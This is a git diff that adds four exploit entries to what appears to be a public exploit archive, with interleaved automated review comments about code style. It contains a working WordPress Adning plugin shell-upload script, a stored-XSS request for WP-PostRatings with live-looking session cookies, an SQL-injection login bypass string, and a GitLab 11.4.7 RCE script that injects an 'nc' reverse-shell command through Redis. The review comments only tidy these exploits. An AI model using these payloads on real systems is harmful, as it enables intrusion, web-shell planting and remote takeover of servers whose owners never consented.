diff --git a/exploits/php/webapps/49332.txt b/exploits/php/webapps/49332.txt
new file mode 100644
index 000000000..e4a3701d1
--- /dev/null
+++ b/exploits/php/webapps/49332.txt
@@ -0,0 +1,73 @@
+# Exploit Title: WordPress Plugin Adning Advertising 1.5.5 - Arbitrary File Upload
+# Google Dork: inurl:/wp-content/plugins/angwp
+# Date: 23/12/2020
+# Exploit Author: spacehen
+# Vendor Homepage: http://adning.com/
+# Version: <1.5.6
+# Tested on: Ubuntu 20.04.1 LTS (x86)
+
+import os.path
+from os import path
+import json
+import requests;
+import sys
+
+def print_banner():
+ print("Adning Advertising < 1.5.6 - Arbitrary File Upload")
+ print("Author -> space_hen (www.lunar.sh)")
+
+def print_usage():
+ print("Usage: python3 exploit.py [target url] [php file]")
+ print("Ex: python3 exploit.py https://example.com ./shell.php")
+
+def vuln_check(uri):
+ response = requests.get(uri)
+ raw = response.text
+
+ if ("no files found" in raw):
+ return True;
+ else:
+ return False;
+
+def main():
+
+ print_banner()
+ if(len(sys.argv) != 3):
+ print_usage();
+ sys.exit(1);
+
+ base = sys.argv[1]
+ file_path = sys.argv[2]
+
+ ajax_action = '_ning_upload_image'
+ admin = '/wp-admin/admin-ajax.php';
+
+ uri = base + admin + '?action=' + ajax_action ;
+ check = vuln_check(uri);
+
+ if(check == False):
+ print("(*) Target not vulnerable!");
+ sys.exit(1)
+
+ if( path.isfile(file_path) == False):
+ print("(*) Invalid file!")
+ sys.exit(1)
+
+ files = {'files[]' : open(file_path)}
+ data = {
+ "allowed_file_types" : "php,jpg,jpeg",
+ "upload" : json.dumps({"dir" : "../"})
+ }
+ print("Uploading Shell...");
+ response = requests.post(uri, files=files, data=data )
+ file_name = path.basename(file_path)
+ if(file_name in response.text):
+ print("Shell Uploaded!")
+ if(base[-1] != '/'):
+ base += '/'
+ print(base + file_name)
+ else:
+ print("Shell Upload Failed")
+ sys.exit(1)
+
+main();
\ No newline at end of file
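Review bot: The control flow in `main()` is written with C-style parentheses, trailing semicolons and explicit comparisons against `False` (`if(check == False):`, `if( path.isfile(file_path) == False):`), which is not idiomatic Python; `if not check:` and `if not path.isfile(file_path):` read the same and the stray `;` on `import requests;`, `return True;` and `main();` can go with them. The handle opened inline in `files = {'files[]' : open(file_path)}` is never closed; wrapping the upload in `with open(file_path) as fh:` closes it on every exit path. `vuln_check` has no docstring saying what it actually establishes — it only tests for the `"no files found"` marker in a GET response — so a one-line `"""Return True if the endpoint answers with the 'no files found' marker; this shows the action responds, not that an upload succeeds."""` would keep the later 'Target not vulnerable!' message honest.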
diff --git a/exploits/php/webapps/49333.txt b/exploits/php/webapps/49333.txt
new file mode 100644
index 000000000..9bf1992c6
--- /dev/null
+++ b/exploits/php/webapps/49333.txt
@@ -0,0 +1,41 @@
+# Exploit Title: WordPress Plugin WP-PostRatings 1.86 - 'postratings_image' Cross-Site Scripting
+# Date: 20-12-2018
+# Software Link: https://wordpress.org/plugins/wp-postratings/
+# Exploit Author: Park Won Seok
+# Version: wp-postratings.1.86
+# Tested on: Windows 10 x64
+
+# description:
+# A Stored Cross-site scripting (XSS) was discovered in wordpress plugins wp-postratings.1.86
+# One parameters(postratings_image) have Cross-Site Scripting.
+
+# POC
+# XSS Stored
+
+POST
+http://localhost/wordpress/wp-admin/admin.php?page=wp-postratings/postratings-options.php
+ HTTP/1.1
+Host: localhost
+Content-Length: 1765
+Cache-Control: max-age=0
+Origin: localhost
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+Referer:
+http://localhost/wordpress/wp-admin/admin.php?page=wp-postratings%2Fpostratings-options.php
+Accept-Encoding: gzip, deflate
+Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
+Cookie:
+wordpress_14f4416c910366e4d17f08fa58e71587=wordpress%7C1545577867%7CZwsmD4U29rPGA853ANHO1NUarjSBZi6ul0sDVvkKLwr%7Cff47715fb398e65023b74d3aad0d0429061e90422614399cf1cffb88df424173;
+wp-settings-1=deleted; wp-settings-time-1=1545201993;
+wordpress_test_cookie=WP+Cookie+check;
+wordpress_logged_in_14f4416c910366e4d17f08fa58e71587=wordpress%7C1545577867%7CZwsmD4U29rPGA853ANHO1NUarjSBZi6ul0sDVvkKLwr%7Cd63f851c891cd0792c2c7e5a2d62342ffb57501777f1e8f0e9c13b8ff0daacc2
+Connection: close
+
+_wpnonce=b841885588&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3Dwp-postratings%2Fpostratings-options.php&postratings_customrating=0&postratings_template_vote=%25RATINGS_IMAGES_VOTE%25+%28%3Cstrong%3E%25RATINGS_USERS%25%3C%2Fstrong%3E+votes%2C+average%3A+%3Cstrong%3E%25RATINGS_AVERAGE%25%3C%2Fstrong%3E+out+of+%25RATINGS_MAX%25%29%3Cbr+%2F%3E%25RATINGS_TEXT%25&postratings_template_text=%25RATINGS_IMAGES%25+%28%3Cem%3E%3Cstrong%3E%25RATINGS_USERS%25%3C%2Fstrong%3E+votes%2C+average%3A+%3Cstrong%3E%25RATINGS_AVERAGE%25%3C%2Fstrong%3E+out+of+%25RATINGS_MAX%25%2C+%3Cstrong%3Erated%3C%2Fstrong%3E%3C%2Fem%3E%29&postratings_template_permission=%25RATINGS_IMAGES%25+%28%3Cem%3E%3Cstrong%3E%25RATINGS_USERS%25%3C%2Fstrong%3E+votes%2C+average%3A+%3Cstrong%3E%25RATINGS_AVERAGE%25%3C%2Fstrong%3E+out+of+%25RATINGS_MAX%25%3C%2Fem%3E%29%3Cbr+%2F%3E%3Cem%3EYou+need+to+be+a+registered+member+to+rate+this.%3C%2Fem%3E&postratings_template_none=%25RATINGS_IMAGES_VOTE%25+%28No+Ratings+Yet%29%3Cbr+%2F%3E%25RATINGS_TEXT%25&postratings_template_highestrated=%3Cli%3E%3Ca+href%3D%22%25POST_URL%25%22+title%3D%22%25POST_TITLE%25%22%3E%25POST_TITLE%25%3C%2Fa%3E+%25RATINGS_IMAGES%25+%28%25RATINGS_AVERAGE%25+out+of+%25RATINGS_MAX%25%29%3C%2Fli%3E&postratings_template_mostrated=%3Cli%3E%3Ca+href%3D%22%25POST_URL%25%22++title%3D%22%25POST_TITLE%25%22%3E%25POST_TITLE%25%3C%2Fa%3E+-+%25RATINGS_USERS%25+votes%3C%2Fli%3E&
+[postratings_image=stars\"onerror=alert(1)
+--]&postratings_max=2&postratings_richsnippet=0&postratings_ratingstext%5B%5D=1+Star&postratings_ratingsvalue%5B%5D=%2B1&postratings_ratingstext%5B%5D=&postratings_ratingsvalue%5B%5D=0&postratings_ajax_style_loading=1&postratings_ajax_style_fading=1&postratings_allowtorate=2&postratings_logging_method=3&Submit=Save+Changes
\ No newline at end of file
diff --git a/exploits/php/webapps/49335.txt b/exploits/php/webapps/49335.txt
new file mode 100644
index 000000000..38ee92886
--- /dev/null
+++ b/exploits/php/webapps/49335.txt
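Review bot: The header does not state the privilege the stored XSS needs: the captured request posts to the plugin's settings page under `wp-admin/admin.php?page=wp-postratings/postratings-options.php` carrying a `wordpress_logged_in_*` cookie and a `_wpnonce`, so saving `postratings_image` presumably requires a session allowed to change plugin options (typically an administrator), which bounds the impact and belongs in the `# description:` block. The `Cookie:` and `_wpnonce` values of the test instance are reproduced verbatim; a PoC normally redacts them (`Cookie: [redacted]`) since they add nothing to reproduction. The request line is also split over three lines (`POST`, the URL, ` HTTP/1.1`) by line wrapping, which a reader may mistake for the actual request format.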
@@ -0,0 +1,14 @@
+# Exploit Title: Apartment Visitors Management System 1.0 - Authentication Bypass
+# Date: 2020-12-24
+# Exploit Author: Kshitiz Raj(manitorpotterk)
+# Vendor Homepage: https://phpgurukul.com/apartment-visitors-management-system-using-php-and-mysql/
+# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10395
+# Version: V1.0
+# Tested on: Windows 10/Kali Linux
+
+Step 1 - Go to url http://localhost/avms/index.php
+*
+
+Step 2 – Enter Username :- ' or '1'='1'# *
+
+Step 3 - Enter Password - anything*
\ No newline at end of file
diff --git a/exploits/ruby/webapps/49334.py b/exploits/ruby/webapps/49334.py
new file mode 100755
index 000000000..3f89b1cd5
--- /dev/null
+++ b/exploits/ruby/webapps/49334.py
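Review bot: The header names neither the vulnerability class nor the affected input, although Step 2 shows the login username field on `index.php` accepting an SQL injection string; the `# Exploit Title:` line (and the matching `files_exploits.csv` description) should say 'SQL Injection' so the entry is findable by anyone triaging this product. The lone `*` after Step 1 and the trailing `*` on Steps 2 and 3 look like copy artifacts; a short `# Description:` block in the style of the other new files would replace them.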
@@ -0,0 +1,101 @@
+# Exploit Title: GitLab 11.4.7 - RCE (Authenticated)
+# Date: 24th December 2020
+# Exploit Author: Sam Redmond
+# Software Link: https://gitlab.com/
+# Environment: GitLab 11.4.7, community edition
+# CVE: CVE-2018-19571 + CVE-2018-19585
+# Version: 11.4.7
+
+#!/usr/bin/python3
+
+import requests
+from bs4 import BeautifulSoup
+import argparse
+import random
+
+
+parser = argparse.ArgumentParser(description='GitLab 11.4.7 RCE')
+parser.add_argument('-u', help='GitLab Username/Email', required=True)
+parser.add_argument('-p', help='Gitlab Password', required=True)
+parser.add_argument('-g', help='Gitlab URL (without port)', required=True)
+parser.add_argument('-l', help='reverse shell ip', required=True)
+parser.add_argument('-P', help='reverse shell port', required=True)
+args = parser.parse_args()
+
+username = args.u
+password = args.p
+gitlab_url = args.g + ":5080"
+local_ip = args.l
+local_port = args.p
+
+session = requests.Session()
+
+# Get Authentication Token
+r = session.get(gitlab_url + "/users/sign_in")
+soup = BeautifulSoup(r.text, features="lxml")
+token = soup.findAll('meta')[16].get("content")
+print(f"[+] authenticity_token: {token}")
+
+login_form = {
+ "authenticity_token": token,
+ "user[login]": username,
+ "user[password]": password,
+ "user[remember_me]": "0"
+}
+r = session.post(f"{gitlab_url}/users/sign_in", data=login_form)
+
+if r.status_code != 200:
+ exit(f"Login Failed:{r.text}")
+
+# Create project
+import_url = "git%3A%2F%2F%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A6379%2Ftest%2F.git"
+project_name = f'project{random.randrange(1, 10000)}'
+project_url = f'{gitlab_url}/{username}'
+
+print(f"[+] Creating project with random name: {project_name}")
+
+form = """\nmulti
+ sadd resque:gitlab:queues system_hook_push
+ lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\\'|""" + f'nc {local_ip} {local_port}' + """ 
\\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1608799993.1234567,\\"enqueued_at\\":1608799993.1234567}"
+ exec
+ exec
+ exec\n"""
+
+r = session.get(f"{gitlab_url}/projects/new")
+soup = BeautifulSoup(r.text, features="lxml")
+
+namespace_id = soup.find(
+ 'input', {'name': 'project[namespace_id]'}).get('value')
+
+project_token = soup.findAll('meta')[16].get("content")
+project_token = project_token.replace("==", "%3D%3D")
+project_token = project_token.replace("+", "%2B")
+
+payload = f"utf8=%E2%9C%93&authenticity_token={project_token}&project%5Bimport_url%5D={import_url}{form}&project%5Bci_cd_only%5D=false&project%5Bname%5D={project_name}&project%5Bnamespace_id%5D={namespace_id}&project%5Bpath%5D={project_name}&project%5Bdescription%5D=&project%5Bvisibility_level%5D=0"
+
+cookies = {
+ 'sidebar_collapsed': 'false',
+ 'event_filter': 'all',
+ 'hide_auto_devops_implicitly_enabled_banner_1': 'false',
+ '_gitlab_session': session.cookies['_gitlab_session'],
+}
+
+headers = {
+ 'User-Agent': 'Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US);',
+ 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
+ 'Accept-Language': 'en-US,en;q=0.5',
+ 'Accept-Encoding': 'gzip, deflate',
+ 'Referer': f'{gitlab_url}/projects',
+ 'Content-Type': 'application/x-www-form-urlencoded',
+ 'Content-Length': '398',
+ 'Connection': 'close',
+ 'Upgrade-Insecure-Requests': '1',
+}
+
+print("[+] Running Exploit")
+r = session.post(
+ gitlab_url+'/projects', data=payload, cookies=cookies, headers=headers, verify=False)
+if "The change you requested was rejected." in r.text:
+ exit('Exploit failed, check input params')
+
+print('[+] Exploit completed successfully!')
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index dfccd4523..b2d631ec3 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
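Review bot: The `#!/usr/bin/python3` shebang sits on line 9 of the file, after the comment header, where the kernel never sees it; since the file is added with mode 100755 it should be the very first line, above `# Exploit Title:`. `exit(f"Login Failed:{r.text}")` and `exit('Exploit failed, check input params')` call the `site`-module builtin rather than `sys.exit(...)`, which is the conventional, always-available form (the file would need `import sys`). `project_url = f'{gitlab_url}/{username}'` is assigned and never read, so the line can be dropped. The file's only top-level comments are the two section markers; a module docstring under the header giving the argument list in one place would document the five single-letter flags, two of which (`-p`, `-P`) differ only in case.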
@@ -43529,6 +43529,7 @@ id,file,description,date,author,type,platform,port
 49312,exploits/php/webapps/49312.txt,"Pandora FMS 7.0 NG 750 - 'Network Scan' SQL Injection (Authenticated)",2020-12-22,"Matthew Aberegg",webapps,php,
 49314,exploits/php/webapps/49314.txt,"CSE Bookstore 1.0 - Multiple SQL Injection",2020-12-22,"Musyoka Ian",webapps,php,
 49315,exploits/php/webapps/49315.txt,"Library Management System 3.0 - _Add Category_ Stored XSS",2020-12-22,"Kislay Kumar",webapps,php,
+49335,exploits/php/webapps/49335.txt,"Apartment Visitors Management System 1.0 - Authentication Bypass",2020-12-24,"Kshitiz Raj",webapps,php,
 49316,exploits/php/webapps/49316.txt,"Multi Branch School Management System 3.5 - _Create Branch_ Stored XSS",2020-12-22,"Kislay Kumar",webapps,php,
 49317,exploits/php/webapps/49317.rb,"WordPress Plugin W3 Total Cache - Unauthenticated Arbitrary File Read (Metasploit)",2020-12-22,"SunCSR Team",webapps,php,
 49318,exploits/linux/webapps/49318.rb,"Webmin 1.962 - 'Package Updates' Escape Bypass RCE (Metasploit)",2020-12-22,AkkuS,webapps,linux,
@@ -43543,3 +43544,6 @@ id,file,description,date,author,type,platform,port
 49329,exploits/php/webapps/49329.txt,"Sales and Inventory System for Grocery Store 1.0 - Multiple Stored XSS",2020-12-23,"Vijay Sachdeva",webapps,php,
 49330,exploits/linux/webapps/49330.rb,"TerraMaster TOS 4.2.06 - Unauthenticated Remote Code Execution (Metasploit)",2020-12-23,AkkuS,webapps,linux,
 49331,exploits/php/webapps/49331.txt,"Baby Care System 1.0 - 'roleid' SQL Injection",2020-12-23,"Vijay Sachdeva",webapps,php,
+49332,exploits/php/webapps/49332.txt,"WordPress Plugin Adning Advertising 1.5.5 - Arbitrary File Upload",2020-12-24,spacehen,webapps,php,
+49333,exploits/php/webapps/49333.txt,"WordPress Plugin WP-PostRatings 1.86 - 'postratings_image' Cross-Site Scripting",2020-12-24,"Park Won Seok",webapps,php,
+49334,exploits/ruby/webapps/49334.py,"GitLab 11.4.7 - RCE (Authenticated)",2020-12-24,"Sam Redmond",webapps,ruby,
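Review bot: The new `49335` row is inserted between `49315` and `49316` in the first hunk, out of id order, while the other three 2020-12-24 rows (`49332`, `49333`, `49334`) are appended after `49331` in the second hunk; placing 49335 after 49334 keeps the index sorted by id like the surrounding rows. The 49335 description repeats the title "Authentication Bypass" without the vulnerability class the PoC actually shows, so a search of this index for SQL injection in that product will miss it.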